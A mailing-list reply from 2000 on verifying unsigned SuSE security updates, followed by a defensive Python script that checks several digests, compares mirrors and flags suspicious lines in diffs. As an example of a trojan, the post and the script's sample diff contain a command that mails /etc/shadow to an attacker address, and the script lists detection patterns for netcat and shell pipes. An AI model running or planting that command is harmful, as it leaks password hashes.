On Thu, Aug 10, 2000 at 21:25 +0200, Thomas Forbriger wrote:
> What are the recommended steps to do security updates from FTP when there is no PGP signature in the files? You know there was this incident with tripwire on the dutch server that was hacked and trojaned as far as I remember. Is there a reason to worry about somebody being able to hack and trojan the security updates supplied via ftp AND to hack and change the md5 sums provided by SuSE at the same time? Or is this coincidence too far from being probable?
The solution would be to combine several methods of checking. Even if an attacker can compromise the data in a way that one algo still fits (MD5 is not 100% secure after all -- how do you want to have unique fingerprints for *any* data when you only have 128 bits to store them?) a second one (SHA1, RIPEMD160) probably fails. If you use tripwire, put another "tripwire alike" besides it. If you have an update package with no sig to check against, get it from different (independent) places and compare them. If the update is available in source form, try to read the diff against the former version. Even if you don't know the internals exactly, you would have recognized some unexpected "mail attacker@somewhere < /etc/shadow" commands in a compromised tcpd package.

Don't rely on a single source, double check for consistency what you get from different directions. Make use of every hurdle you can stack up instead of thinking "one obstacle in the chain should suffice".

And don't believe in "automated security". I feel quite strongly that automatic updates won't work without heavy human supervision. :) Having your system (potentially) damaged by a simple-minded program sucking in every update unchecked just because "the file was there and I felt like applying it" is not fun. When something breaks, *I* want to be the reason why. :>

virtually yours
82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
-- 
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.
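The three checks Gerhard stacks up (several digest algorithms, several independent copies of the same file, and a look at the source diff for lines that should not be there) can be put into one small script. The code below is an added example, not something from the original thread or from SuSE's tooling. Everything in it is constructed for the example: the package bytes, the mirror names, the "published" digest list (which is simply computed from the clean copy here) and the sample diff; only the package name tcpd and the "mail attacker@somewhere < /etc/shadow" line come from the post. RIPEMD-160 is named in the post but is not present in every hashlib build, so SHA-256 stands in as the second, structurally different algorithm next to MD5 and SHA-1.

```python
# Added example: verifying an unsigned update by stacking several checks.
# All data below is constructed; nothing here is SuSE's own tooling.
import hashlib
import re
from collections import Counter
from typing import Dict, Iterable, List

# MD5 plus two structurally different algorithms (assumption: RIPEMD-160
# from the post is replaced by SHA-256, which every hashlib build has).
DEFAULT_ALGORITHMS = ("md5", "sha1", "sha256")


def digests(data: bytes, algorithms: Iterable[str] = DEFAULT_ALGORITHMS) -> Dict[str, str]:
    """Hex digest of `data` under every named algorithm."""
    return {name: hashlib.new(name, data).hexdigest() for name in algorithms}


def failed_digests(data: bytes, published: Dict[str, str]) -> List[str]:
    """Algorithms in `published` whose digest does NOT match `data`.

    Empty list: every published digest matched.  A partial list is the
    case the post worries about: one algorithm still fits, another fails,
    so either the file or the digest list was tampered with.
    """
    actual = digests(data, published.keys())
    return [name for name, hexdigest in published.items()
            if actual[name] != hexdigest.strip().lower()]


def disagreeing_mirrors(copies: Dict[str, bytes]) -> List[str]:
    """Mirrors whose copy differs byte-for-byte from the majority.

    If no two copies agree, every mirror is reported.
    """
    fingerprint = {name: hashlib.sha256(data).hexdigest() for name, data in copies.items()}
    top_hash, top_count = Counter(fingerprint.values()).most_common(1)[0]
    if top_count <= 1 and len(copies) > 1:   # no majority at all
        return sorted(copies)
    return sorted(name for name, h in fingerprint.items() if h != top_hash)


# Patterns an added line in a "security fix" has no business matching.
SUSPICIOUS = (
    r"/etc/shadow",
    r"/etc/passwd",
    r"\bmail\b.*<",          # mail attacker@somewhere < /etc/shadow
    r"\b(nc|netcat|telnet)\b",
    r"\|\s*(sh|bash)\b",
)


def suspicious_added_lines(unified_diff: str, patterns: Iterable[str] = SUSPICIOUS) -> List[str]:
    """Lines ADDED by a unified diff that match any pattern.

    A cheap first pass at "reading the diff against the former version";
    it points at where to look, it does not replace reading the diff.
    """
    compiled = [re.compile(p) for p in patterns]
    hits = []
    for line in unified_diff.splitlines():
        if line.startswith("+") and not line.startswith("+++"):
            body = line[1:]
            if any(c.search(body) for c in compiled):
                hits.append(body)
    return hits


# --- constructed sample data (not a real package, mirror or diff) ----------
CLEAN = b"tcpd-7.6: fake package contents for the example\n"
TROJANED = CLEAN + b"mail attacker@somewhere < /etc/shadow\n"
PUBLISHED = digests(CLEAN)          # stands in for the vendor's digest list
MIRRORS = {
    "ftp.example.de": CLEAN,
    "ftp.example.nl": TROJANED,     # the compromised mirror
    "ftp.example.us": CLEAN,
}
SAMPLE_DIFF = """--- tcpd-7.5/hosts_access.c
+++ tcpd-7.6/hosts_access.c
@@ -10,3 +10,5 @@
 int allow(struct request_info *req)
 {
+    /* harmless refactoring */
+    system("mail attacker@somewhere < /etc/shadow");
     return check_table(req);
"""


def verify_update(copies: Dict[str, bytes], published: Dict[str, str], diff: str = "") -> List[str]:
    """Run every check; an empty list means nothing objected."""
    findings = []
    for mirror in disagreeing_mirrors(copies):
        findings.append(f"{mirror}: copy differs from the other mirrors")
    for mirror, data in copies.items():
        for alg in failed_digests(data, published):
            findings.append(f"{mirror}: {alg} digest does not match published value")
    for line in suspicious_added_lines(diff):
        findings.append(f"diff adds suspicious line: {line.strip()}")
    return findings


if __name__ == "__main__":
    for finding in verify_update(MIRRORS, PUBLISHED, SAMPLE_DIFF) or ["all checks passed"]:
        print(finding)
```

The point of `verify_update` returning every finding rather than stopping at the first is the one the post makes: a single check passing tells you little, a single check failing tells you a lot, and the human reading the list still decides whether to install.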